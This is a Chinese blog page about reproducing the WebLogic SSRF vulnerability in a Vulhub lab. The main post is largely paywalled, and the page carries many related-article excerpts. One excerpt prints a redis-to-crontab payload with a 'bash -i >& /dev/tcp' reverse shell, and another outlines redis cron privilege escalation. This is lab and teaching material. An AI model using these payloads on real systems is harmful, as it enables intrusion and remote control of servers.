【weblogic ssrf漏洞复现】

最新推荐文章于 2024-08-26 10:47:05 发布

fly哥

最新推荐文章于 2024-08-26 10:47:05 发布

阅读量385

点赞数

文章标签：安全 web安全

本文链接：https://blog.youkuaiyun.com/m0_71635484/article/details/129662323

版权

文章详细描述了如何在Vulhub靶场的SSRF目录下，通过启用7001端口来复现和利用SSRF漏洞。使用burpsuite抓包分析，修改operator的URL连接到内网的redis服务，通过写入恶意脚本到/etc目录并利用URL编码绕过限制，尝试远程控制。然而，监听操作未能成功。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

一、搭建靶场

进入vulhub靶场，进入ssrf目录，启用7001端口查看并进行ssrf漏洞实验。

二、复现步骤

发现源代码存在链接，用burpsuite抓取包，查看operator，发现正是链接。

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

fly哥

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

weblogic ssrf 漏洞复现

薛定谔嘚喵博客

05-06

728

Weblogic中存在一个SSRF漏洞，利用该漏洞可以发送任意HTTP请求，进而攻击内网中redis、fastcgi等脆弱组件。

WebLogic SSRF漏洞复现及安全防护

XvrgMatlab的博客

09-26

124

本文将详细介绍如何复现WebLogic SSRF漏洞，并提供相应的源代码示例，同时探讨针对该漏洞的安全防护措施。为了保护WebLogic服务器免受SSRF漏洞的攻击，建议采取输入验证和过滤、防火墙配置和网络隔离、更新和安全配置等安全防护措施。通过综合应用这些措施，可以有效降低WebLogic服务器受到SSRF漏洞攻击的风险，提升系统的安全性。这是一个非常简单的示例，用于说明SSRF漏洞的原理。方法中，可以实现自定义的输入验证逻辑，例如检查协议是否为HTTP或HTTPS，并限制可以访问的域名。

参与评论您还未登录，请先登录后发表或查看评论

SSRF——weblogic vulhub 漏洞复现及内网redis反弹shell

weixin_43774222的博客

03-17

6698

一、概述 SSRF（ Server-side Request Forgery ）服务端请求伪造。很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL，web应用可以获取图片，下载文件，读取文件内容等。这个功能如果被恶意使用，可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。主要攻击手段 1.可以对外网、服务器所在内网、本地进行端口扫描，获取一些服务的banner信息; 2.攻击运行在内网或本地的应用程序（比如溢出）; 3.对内网web应用进行指纹识别，通过访问默认文件实现

Weblogic SSRF(CVE-2014-4210)漏洞复现

m0_64583632的博客

02-06

622

Weblogic SSRF(CVE-2014-4210)漏洞复现

Weblogic SSRF漏洞复现（CVE-2014-4210）【vulhub靶场】

m0_55854679的博客

08-09

1887

Weblogic中存在一个SSRF漏洞，利用该漏洞可以发送任意HTTP请求，进而攻击内网中redis、fastcgi等脆弱组件。

漏洞复现——vulhub中的SSRF漏洞

qq_52666132的博客

07-07

1551

vulhub中ssrf漏洞复现

漏洞复现篇——利用vulhub模拟Weblogic的SSRF漏洞

爱国小白帽

01-15

3324

SSRF漏洞：SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由恶意访问者构造形成由服务端发起请求的一个安全漏洞。一般情况下，SSRF访问的目标是从外网无法访问的内部系统。（正是因为它是由服务端发起的，所以它能够请求到与它相连而与外网隔离的内部系统）SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。...

Weblogic SSRF漏洞复现

K_ShenH的博客

06-24

1179

Weblogic SSRF漏洞

weblogic ssrf漏洞复现

qq_38415434的博客

08-07

387

采用的虚拟机环境为ubuntu16.04，在虚拟机上搭建好docker环境。采用的vulhub来进行复现。使用git来下载，命令为git clone https://github.com/vulhub/vulhub.git 进入ssrf漏洞中， cd /vulhub/weblogic/ssrf 创建漏洞环境 docker-compose up -d 查看容器 docker ps 虚拟机地...

漏洞复现-vulhub复现Weblogic的SSRF漏洞

sweetie 的博客

05-08

1551

模拟Weblogic的SSRF漏洞实验： 1.打开搭建好vulhub的虚拟机，输入su切换到root用户如果不切换，则会报下面的错 2、进入到vulhub下weblogic/ssrf/中用gedit打开靶场说明书README.md ls gedit README.md 3、使用docker-compose up -d命令打开靶场，复制网址http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp 4、用ifconfig或ip addr

vulhub weblogic ssrf漏洞复现

qq_53409748的博客

03-27

215

SSRF是一种由攻击者构造形成有服务器发起求情的一个安全漏洞，一般情况下，攻击目标是从外网无法访问的内部系统，正是因为它由服务端发起的，所以他能请求到与他相连而与外网隔离点内部系统。

vulhub-SSRF服务端请求伪造漏洞复现

m0_58265086的博客

09-04

139

复制后如下图，发送数据包。

SSRF漏洞复现(服务器端请求伪造)

最新发布

人们并不感谢罗辑

08-26

1171

SSRF服务端请求伪造(Server-Side Request Forgery)，是一种由攻击者构造形成由服务器端发起请求的一个漏洞。利用一个可以发起网络请求的服务当作跳板来攻击内部其他服务。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统SSRF攻击的目标是从外网无法访问的内部系统。

利用Weblogic中间件存在的SSRF漏洞结合redis未授权访问漏洞GetShell

wenqingshuo321的博客

10-11

917

在Search Public Registries，选择Public Registry中的 IBM，同时勾选Search by business name，开启bp进行抓包，点击search。set 1 "\n\n\n\n * * * * * root bash -i >& /dev/tcp/{本地物理机ip}/1234 0>&1\n\n\n\n"给redis服务器发送三条命令，将其写入redis的容器里里面的/etc/crontab，从而将shell反弹到本地物理机ip的1234端口。

[Java安全]—weblogic常见漏洞

Sentiment的博客

07-11

3550

本来想跟一些T3反序列化的，奈何本地环境怎么都起不起来先复现一下常见漏洞吧。。。Weblogic是美国Oracle公司出品的一个应用服务器(application server)，确切的说是一个基于Java EE架构的中间件，是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。Vulhub - Docker-Compose file for vulnerability environment 启动环境后访问，进入后台弱口令直接登录weblogic常用弱口令： htt

redis写定时任务获取root权限

repoman的博客

12-09

833

前提: 1.redis由root用户启动。 2.开启cron的时候，/var/spool/cron linux机器下默认的计划任务，linux会定时去执行里面的任务。启动服务：/sbin/service crond start 或 /etc/init.d/crond start（centos系列） sudo /etc/init.d/cron start （ubuntu系列）一.windows下 config set dir /var/spool/cron config set db..

Web 安全漏洞 SSRF 简介及解决方案

weixin_33811539的博客

01-22

1360

Update：评论区有同学提出通过域名获取 IP 地址时可能遭遇攻击，感谢提醒。本人非安全专业相关人士，了解不多，实在惭愧。说到 Web 安全，我们前端可能接触较多的是 XSS 和 CSRF。工作原因，在所负责的内部服务中遭遇了SSRF 的困扰，在此记录一下学习过程及解决方案。SSRF（Server-Side Request Forgery），即服务端请求伪造，是一种由攻击者构造形成由服务端...

Weblogic ssrf

沐目的博客

07-30

2167

集训第五周星期一~二一.首先总结知识点： 1.ssrf：服务端请求伪造，好像有三种利用方式，但是我目前就只会最普通的一种，利用SSRF进行端口探测，也是写这道题需要用的。有时候服务端的一个内网中有漏洞，可是我们又没有办法直接访问，所以我们就需要通过服务器，去访问服务器的内网，所以叫服务端请求伪造。有这个漏洞的条件，就是服务器端，需要有与内网传输数据的接口，要不然无法访问内网啊。通常情况下，比...

vulhub weblogic ssrf复现

08-31

您好！要在vulhub上复现WebLogic的SSRF漏洞，您可以按照以下步骤进行操作： 1. 首先，确保您已经安装了Docker和Docker Compose，这样您就可以在本地运行vulhub环境。如果您还没有安装它们，请先安装。 2. 下载vulhub的代码库。您可以在GitHub上找到vulhub的代码库，并使用git命令将其克隆到本地。 3. 进入vulhub目录并找到weblogic/ssrf目录。在这个目录中，您将找到一个docker-compose.yml文件，其中包含了启动WebLogic容器所需的配置信息。 4. 根据您的需求编辑docker-compose.yml文件。您可以修改端口映射、环境变量等配置信息。确保您将容器的访问端口映射到主机的某个端口，以便在浏览器中访问。 5. 启动WebLogic容器。通过运行以下命令启动WebLogic容器：`docker-compose up -d`。这会启动WebLogic容器，并将其与您在docker-compose.yml文件中配置的端口进行关联。 6. 访问WebLogic控制台。打开您喜欢的浏览器，并访问`http://localhost:7001/console`（假设您将容器的访问端口映射到了7001端口）。这将打开WebLogic控制台。 7. 在WebLogic控制台中，尝试进行SSRF漏洞复现。您可以根据具体的漏洞利用方法进行操作。请注意，漏洞利用方法可能因不同的漏洞而异，具体的步骤可能因您选择的漏洞而有所不同。请确保在进行任何漏洞复现前，了解所使用的漏洞的影响和风险，并在合法授权范围内进行测试。此外，建议仅在安全实验室环境中进行漏洞复现，避免对未经授权的系统造成任何伤害。希望这些步骤对您有帮助！如需进一步了解，请随时提问。